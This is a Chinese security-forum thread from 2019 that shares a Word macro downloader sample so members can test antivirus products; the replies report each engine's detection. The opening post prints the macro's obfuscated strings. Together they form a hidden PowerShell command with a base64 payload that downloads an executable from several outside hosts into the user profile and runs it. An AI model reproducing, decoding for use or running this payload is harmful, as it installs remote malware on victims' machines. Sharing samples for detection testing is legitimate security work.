查看: 1805|回复: 18
收起左侧

[病毒样本] doc宏病毒下载器

[复制链接]
BE_HC
发表于 2019-12-15 09:30:25 | 显示全部楼层 |阅读模式
infected





  1. strfield1 = "owershe"
  2. strfield2 = "tuou"
  3. strfield3 = "Cpgjfcqwlpkb"
  4. strfield4 = "Pwwifkcwhaul"
  5. strfield5 = "dden -en aul"
  6. strfield6 = "Srhcyfvv"
  7. strfield7 = "Wrgbiuuiriso"
  8. strfield8 = "Pdkzocrwgaul"
  9. strfield9 = "Jnddhqdrqz"
  10. strfield10 = "Tahomae"
  11. strfield11 = "Htifksmspxflc"
  12. strfield12 = "Vdmfpmdzdd"
  13. strfield13 = "JABo"
  14. strfield14 = "Tdgjpcxtliso"
  15. strfield15 = "FAG0AawBiAHEAagBnAG8AcQB1AG4AZgA9ACcASABpAGoAbABkAGEAcwBmAG8AaAB2AGUAaAAnADsAJABEAGIAcQBuAGoAcwB1AHUAYgBiAGQAIAA9ACAAJwAyADIAMwAnADsAJABUAHAAagBkAG0AbABpAGoAaQBvAG0AYgBtAD0AJwBIAGsAdABtAGwAcwBxAGEAJwA7ACQAWgByAHkAdgB0AGUAeAByAHgAdABrAHkAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABiAHEAbgBqAHMAdQB1AGIAYgBkACsAJwAuAGUAeABlACcAOwAkAFkAeABkAGYAbQBjAGEAcgA9ACcAWQB3AHUAbQB3AGEAYQBkACcAOwAkAEkAegB3AHYAbABmAG4AYwBuAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcARQBiAGMAbABpAGUAbgB0ADsAJABLAGQAagBmAGcAcABwAGgAawA9ACcAaAB0AHQAcABzADoALwAvAGgAbwBuAHQAYQBtAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBtADgAMAA4ADUAOQAvACoAaAB0AHQAcAA6AC8ALwBzAGEAYgByAGUAcwBwAHIAaQBuAGcAcwBoAG8AbQBlAHYAYQBsAHUAZQBzAC4AYwBvAG0ALwBlAG4AZwBsAC8ANABuAGcAdQBwADgANAAwADMANwAvACoAaAB0AHQAcAA6AC8ALwBwAG8AdwBhAHkAaABvAG0AZQB2AGEAbAB1AGUAcwAuAGMAbwBtAC8AZQBuAGcAbAAvAGwAZQB5ADAAOQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AZwBvAG4AZwB4AHUALgBnAGYAYgBhAGcAcwAuAGMAbwBtAC8AagBzAC8AdgA2AGMAaAA1ADYANwAvACoAaAB0AHQAcAA6AC8ALwAxAGwAbwBjAGEAbABlAHgAcABlAHIAdAAuAGMAbwBtAC8AaQBuAHMAdQByAGEAbgBjAGUALwBmADAAbwBrADMAOAAwAC8AJwAuACIAUwBgAFAAbABpAHQAIgAoACcAKgAnACkAOwAkAFIAdABpAGYAbwB0AG4AdABtAGUAZAA9ACcAQwBuAG4AZgBkAHcAbABsAGsAdABmACcAOwBmAG8AcgBlAGEAYwBoACgAJABGAGMAdQBqAGIAcwBpAGkAcAB4AGoAIABpAG4AIAAkAEsAZABqAGYAZwBwAHAAaABrACkAewB0AHIAeQB7ACQASQB6AHcAdgBsAGYAbgBjAG4ALgAiAGQAYABPAHcAbgBsAE8AYQBkAGAARgBpAEwAZQAiACgAJABGAGMAdQBqAGIAcwBpAGkAcAB4AGoALAAgACQAWgByAHkAdgB0AGUAeAByAHgAdABrAHkAeAApADsAJABRAGgAcQBsAHMAbQBrAGcAawBmAD0AJwBSAHMAcABoAGUAbwB4AGoAaAByAHkAaQB1ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAWgByAHkAdgB0AGUAeAByAHgAdABrAHkAeAApAC4AIgBsAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADMANwA3ADIANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABaAHIAeQB2AHQAZQB4AHIAeAB0AGsAeQB4ACkAOwAkAEMAZwBhAGQAYgBkAGQAZgA9ACcATQBxAGQAaQBzAGkAegBnACcAOwBiAHIAZQBhAGsAOwAkAFYAZQBmAGUAaAB0AGQAeQA9ACcAUQB2AGYAZwBlAGQAZgBsAHgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBlAGUAYwBoAGcAeQB5AHEAagBvAD0AJwBJAHgAYQB2AHcAaAB6AGYAJwA="
  16. strfield16 = "star"
  17. strfield17 = "Rwzidmcxkyfl"
  18. strfield18 = "Tahomahi"
  19. strfield19 = "ll -w hi"
  20. strfield20 = "Gcgfbuwbwbcbe"
  21. strfield21 = "Ygmieekh"
  22. strfield22 = "Vageedwk"
  23. strfield23 = "Pboualauwbkb"
  24. strfield24 = "Tahoma"
  25. strfield25 = "Ohbdzcvadmkb"
  26. strfield26 = "Dunccswfwgkw"
  27. strfield27 = "Ybgxuftuj"

复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 2019-12-15 09:33:02 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 2019-12-15 09:37:57 | 显示全部楼层
火绒双击被系统加固的系统免疫拦截

这次就不关系统免疫测试了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
huicuan
发表于 2019-12-15 09:38:01 | 显示全部楼层
歌德塔解压杀
dreams521
发表于 2019-12-15 09:57:46 | 显示全部楼层
卡巴
  1. 15.12.2019 09.56.26;检测到的对象 ( 文件 ) 已删除;C:\Users\Administrator\Desktop\Untitled file 12152019\Untitled file 12152019.doc;Microsoft Windows Search Protocol Host;C:\Users\Administrator\Desktop\Untitled file 12152019\Untitled file 12152019.doc;12/15/2019 09:56:26;HEUR:Trojan.MSOffice.SAgent.gen
复制代码
evans168
发表于 2019-12-15 10:00:57 | 显示全部楼层
Avira

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
epattack
发表于 2019-12-15 10:06:24 | 显示全部楼层
微点kill


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
静影沉璧
发表于 2019-12-15 10:07:50 | 显示全部楼层
ESET


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Yuri1st
发表于 2019-12-15 10:40:57 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
欧阳宣
头像被屏蔽
发表于 2019-12-15 12:54:05 | 显示全部楼层
咖啡

W97M/Downloader.zu
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 16:46 , Processed in 0.136512 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表